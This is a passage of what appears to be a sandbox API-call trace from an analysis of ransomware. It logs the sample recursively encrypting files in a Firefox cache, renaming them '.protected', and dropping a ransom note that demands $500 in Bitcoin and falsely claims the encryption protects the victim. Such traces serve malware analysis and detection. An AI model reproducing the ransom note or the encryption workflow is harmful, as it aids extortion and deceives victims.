HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\B\\*", lpFindFileData=0x295e080 | out: lpFindFileData=0x295e080) returned 0x47bb50 [0086.281] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0086.281] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0086.281] lstrcmpiW 
(lpString1=".", lpString2="Program Files (x86)") returned -1 [0086.281] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0086.281] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0086.281] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\B\\.") returned 99 [0086.281] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0086.281] FindNextFileW (in: hFindFile=0x47bb50, lpFindFileData=0x295e080 | out: lpFindFileData=0x295e080) returned 1 [0086.281] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0086.282] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0086.282] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0086.282] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0086.282] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0086.282] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\B\\..") returned 100 [0086.282] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0086.282] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0086.282] FindNextFileW (in: hFindFile=0x47bb50, lpFindFileData=0x295e080 | out: lpFindFileData=0x295e080) returned 0 [0086.282] FindClose (in: hFindFile=0x47bb50 | out: hFindFile=0x47bb50) returned 1 [0086.282] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\B\\RESTORE_FILES.txt") returned 115 [0086.282] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\B\\RESTORE_FILES.txt" (normalized: 
"c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\firefox\\profiles\\silmbjec.default\\cache\\b\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0086.283] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0086.283] WriteFile (in: hFile=0x158, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295e064, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295e064*=0x53d, lpOverlapped=0x0) returned 1 [0086.283] lstrlenA 
(lpString="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") returned 684 [0086.284] WriteFile (in: hFile=0x158, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295e064, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295e064*=0x2ac, lpOverlapped=0x0) returned 1 [0086.284] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0086.284] WriteFile (in: hFile=0x158, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295e064, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295e064*=0xb1, lpOverlapped=0x0) returned 1 [0086.284] CloseHandle (hObject=0x158) returned 1 [0086.284] FindNextFileW (in: hFindFile=0x47bb10, lpFindFileData=0x295e2f0 | out: lpFindFileData=0x295e2f0) returned 1 [0086.284] lstrcmpiW (lpString1="C", lpString2="Windows") returned -1 [0086.284] lstrcmpiW (lpString1="C", lpString2="Program Files") returned -1 [0086.284] lstrcmpiW (lpString1="C", lpString2="Program Files (x86)") returned -1 [0086.284] lstrcmpiW (lpString1="C", lpString2="$Recycle.bin") returned 1 [0086.284] lstrcmpiW (lpString1="C", lpString2="System Volume Information") returned -1 [0086.284] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\C") returned 97 [0086.284] lstrcmpW (lpString1="C", lpString2=".") returned 1 [0086.284] lstrcmpW (lpString1="C", lpString2="..") returned 1 [0086.284] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\C\\*") returned 99 [0086.284] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS 
HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\C\\*", lpFindFileData=0x295e080 | out: lpFindFileData=0x295e080) returned 0x47bb50 [0086.284] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0086.284] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0086.284] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0086.284] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0086.284] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0086.284] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\C\\.") returned 99 [0086.284] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0086.284] FindNextFileW (in: hFindFile=0x47bb50, lpFindFileData=0x295e080 | out: lpFindFileData=0x295e080) returned 1 [0086.284] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0086.284] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0086.284] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0086.285] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0086.285] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0086.285] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\C\\..") returned 100 [0086.285] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0086.285] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0086.285] FindNextFileW (in: hFindFile=0x47bb50, lpFindFileData=0x295e080 | out: lpFindFileData=0x295e080) returned 1 [0086.285] lstrcmpiW (lpString1="E6", lpString2="Windows") returned -1 [0086.285] lstrcmpiW (lpString1="E6", lpString2="Program Files") returned -1 [0086.285] lstrcmpiW 
(lpString1="E6", lpString2="Program Files (x86)") returned -1 [0086.285] lstrcmpiW (lpString1="E6", lpString2="$Recycle.bin") returned 1 [0086.285] lstrcmpiW (lpString1="E6", lpString2="System Volume Information") returned -1 [0086.285] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\C\\E6") returned 100 [0086.285] lstrcmpW (lpString1="E6", lpString2=".") returned 1 [0086.285] lstrcmpW (lpString1="E6", lpString2="..") returned 1 [0086.285] wnsprintfW (in: pszDest=0xce0048, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\C\\E6\\*") returned 102 [0086.285] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\C\\E6\\*", lpFindFileData=0x295de10 | out: lpFindFileData=0x295de10) returned 0x47bb90 [0086.286] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0086.286] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0086.286] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0086.286] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0086.286] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0086.286] wnsprintfW (in: pszDest=0xce0048, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\C\\E6\\.") returned 102 [0086.286] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0086.286] FindNextFileW (in: hFindFile=0x47bb90, lpFindFileData=0x295de10 | out: lpFindFileData=0x295de10) returned 1 [0086.286] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0086.286] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0086.286] 
lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0086.286] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0086.286] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0086.286] wnsprintfW (in: pszDest=0xce0048, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\C\\E6\\..") returned 103 [0086.286] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0086.286] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0086.286] FindNextFileW (in: hFindFile=0x47bb90, lpFindFileData=0x295de10 | out: lpFindFileData=0x295de10) returned 1 [0086.286] lstrcmpiW (lpString1="9DCB7d01", lpString2="Windows") returned -1 [0086.286] lstrcmpiW (lpString1="9DCB7d01", lpString2="Program Files") returned -1 [0086.286] lstrcmpiW (lpString1="9DCB7d01", lpString2="Program Files (x86)") returned -1 [0086.286] lstrcmpiW (lpString1="9DCB7d01", lpString2="$Recycle.bin") returned 1 [0086.286] lstrcmpiW (lpString1="9DCB7d01", lpString2="System Volume Information") returned -1 [0086.286] wnsprintfW (in: pszDest=0xce0048, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\C\\E6\\9DCB7d01") returned 109 [0086.286] StrStrIW (lpFirst="9DCB7d01", lpSrch=".protected") returned 0x0 [0086.286] lstrcmpW (lpString1="9DCB7d01", lpString2="RESTORE_FILES.txt") returned -1 [0086.286] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295ddac | out: pbBuffer=0x295ddac) returned 1 [0086.286] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ddd4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ddd4*=0x30) returned 1 [0086.286] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS 
HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\C\\E6\\9DCB7d01" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\firefox\\profiles\\silmbjec.default\\cache\\c\\e6\\9dcb7d01"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x160 [0086.287] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\C\\E6\\9DCB7d01") returned 109 [0086.287] StrStrW (lpFirst="9DCB7d01", lpSrch=".txt") returned 0x0 [0086.287] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\C\\E6\\9DCB7d01") returned 109 [0086.287] StrStrW (lpFirst="9DCB7d01", lpSrch=".rar") returned 0x0 [0086.287] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\C\\E6\\9DCB7d01") returned 109 [0086.287] StrStrW (lpFirst="9DCB7d01", lpSrch=".zip") returned 0x0 [0086.287] ReadFile (in: hFile=0x160, lpBuffer=0xcf0090, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ddf4, lpOverlapped=0x0 | out: lpBuffer=0xcf0090*, lpNumberOfBytesRead=0x295ddf4*=0x2800, lpOverlapped=0x0) returned 1 [0086.288] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0086.288] WriteFile (in: hFile=0x160, lpBuffer=0xcf0090*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ddf4, lpOverlapped=0x0 | out: lpBuffer=0xcf0090*, lpNumberOfBytesWritten=0x295ddf4*=0x2800, lpOverlapped=0x0) returned 1 [0086.289] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0086.289] WriteFile (in: hFile=0x160, lpBuffer=0x295ddcc*, nNumberOfBytesToWrite=0x4, 
lpNumberOfBytesWritten=0x295ddf4, lpOverlapped=0x0 | out: lpBuffer=0x295ddcc*, lpNumberOfBytesWritten=0x295ddf4*=0x4, lpOverlapped=0x0) returned 1 [0086.290] WriteFile (in: hFile=0x160, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ddf4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ddf4*=0x30, lpOverlapped=0x0) returned 1 [0086.290] CloseHandle (hObject=0x160) returned 1 [0086.290] wnsprintfW (in: pszDest=0xcf0090, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\C\\E6\\9DCB7d01.protected") returned 119 [0086.290] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\C\\E6\\9DCB7d01" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\firefox\\profiles\\silmbjec.default\\cache\\c\\e6\\9dcb7d01"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\C\\E6\\9DCB7d01.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\firefox\\profiles\\silmbjec.default\\cache\\c\\e6\\9dcb7d01.protected")) returned 1 [0086.291] FindNextFileW (in: hFindFile=0x47bb90, lpFindFileData=0x295de10 | out: lpFindFileData=0x295de10) returned 0 [0086.291] FindClose (in: hFindFile=0x47bb90 | out: hFindFile=0x47bb90) returned 1 [0086.291] wnsprintfW (in: pszDest=0xce0048, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\C\\E6\\RESTORE_FILES.txt") returned 118 [0086.291] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\C\\E6\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js 
halpmcxz\\appdata\\local\\mozilla\\firefox\\profiles\\silmbjec.default\\cache\\c\\e6\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x15c [0086.291] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0086.291] WriteFile (in: hFile=0x15c, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295ddf4, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295ddf4*=0x53d, lpOverlapped=0x0) returned 1 [0086.292] lstrlenA 
(lpString="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") returned 684 [0086.292] WriteFile (in: hFile=0x15c, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295ddf4, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295ddf4*=0x2ac, lpOverlapped=0x0) returned 1 [0086.292] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0086.292] WriteFile (in: hFile=0x15c, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295ddf4, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295ddf4*=0xb1, lpOverlapped=0x0) returned 1 [0086.292] CloseHandle (hObject=0x15c) returned 1 [0086.292] FindNextFileW (in: hFindFile=0x47bb50, lpFindFileData=0x295e080 | out: lpFindFileData=0x295e080) returned 0 [0086.292] FindClose (in: hFindFile=0x47bb50 | out: hFindFile=0x47bb50) returned 1 [0086.292] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\C\\RESTORE_FILES.txt") returned 115 [0086.292] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\C\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\firefox\\profiles\\silmbjec.default\\cache\\c\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0086.293] lstrlenA (lpString="! 
SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0086.293] WriteFile (in: hFile=0x158, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295e064, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295e064*=0x53d, lpOverlapped=0x0) returned 1 [0086.294] lstrlenA (lpString="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") returned 684 [0086.294] WriteFile (in: hFile=0x158, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295e064, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295e064*=0x2ac, lpOverlapped=0x0) returned 1 
[0086.294] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0086.294] WriteFile (in: hFile=0x158, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295e064, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295e064*=0xb1, lpOverlapped=0x0) returned 1 [0086.294] CloseHandle (hObject=0x158) returned 1 [0086.295] FindNextFileW (in: hFindFile=0x47bb10, lpFindFileData=0x295e2f0 | out: lpFindFileData=0x295e2f0) returned 1 [0086.295] lstrcmpiW (lpString1="D", lpString2="Windows") returned -1 [0086.295] lstrcmpiW (lpString1="D", lpString2="Program Files") returned -1 [0086.295] lstrcmpiW (lpString1="D", lpString2="Program Files (x86)") returned -1 [0086.295] lstrcmpiW (lpString1="D", lpString2="$Recycle.bin") returned 1 [0086.295] lstrcmpiW (lpString1="D", lpString2="System Volume Information") returned -1 [0086.295] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\D") returned 97 [0086.295] lstrcmpW (lpString1="D", lpString2=".") returned 1 [0086.295] lstrcmpW (lpString1="D", lpString2="..") returned 1 [0086.295] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\D\\*") returned 99 [0086.295] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\D\\*", lpFindFileData=0x295e080 | out: lpFindFileData=0x295e080) returned 0x47bb50 [0086.296] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0086.296] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0086.296] lstrcmpiW 
(lpString1=".", lpString2="Program Files (x86)") returned -1 [0086.296] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0086.296] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0086.296] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\D\\.") returned 99 [0086.296] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0086.296] FindNextFileW (in: hFindFile=0x47bb50, lpFindFileData=0x295e080 | out: lpFindFileData=0x295e080) returned 1 [0086.296] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0086.296] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0086.296] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0086.296] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0086.296] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0086.296] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\D\\..") returned 100 [0086.297] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0086.297] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0086.297] FindNextFileW (in: hFindFile=0x47bb50, lpFindFileData=0x295e080 | out: lpFindFileData=0x295e080) returned 1 [0086.297] lstrcmpiW (lpString1="08", lpString2="Windows") returned -1 [0086.297] lstrcmpiW (lpString1="08", lpString2="Program Files") returned -1 [0086.297] lstrcmpiW (lpString1="08", lpString2="Program Files (x86)") returned -1 [0086.297] lstrcmpiW (lpString1="08", lpString2="$Recycle.bin") returned 1 [0086.297] lstrcmpiW (lpString1="08", lpString2="System Volume Information") returned -1 [0086.297] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: 
pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\D\\08") returned 100 [0086.297] lstrcmpW (lpString1="08", lpString2=".") returned 1 [0086.297] lstrcmpW (lpString1="08", lpString2="..") returned 1 [0086.297] wnsprintfW (in: pszDest=0xce0048, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\D\\08\\*") returned 102 [0086.297] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\D\\08\\*", lpFindFileData=0x295de10 | out: lpFindFileData=0x295de10) returned 0x47bb90 [0086.298] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0086.298] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0086.298] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0086.298] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0086.298] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0086.298] 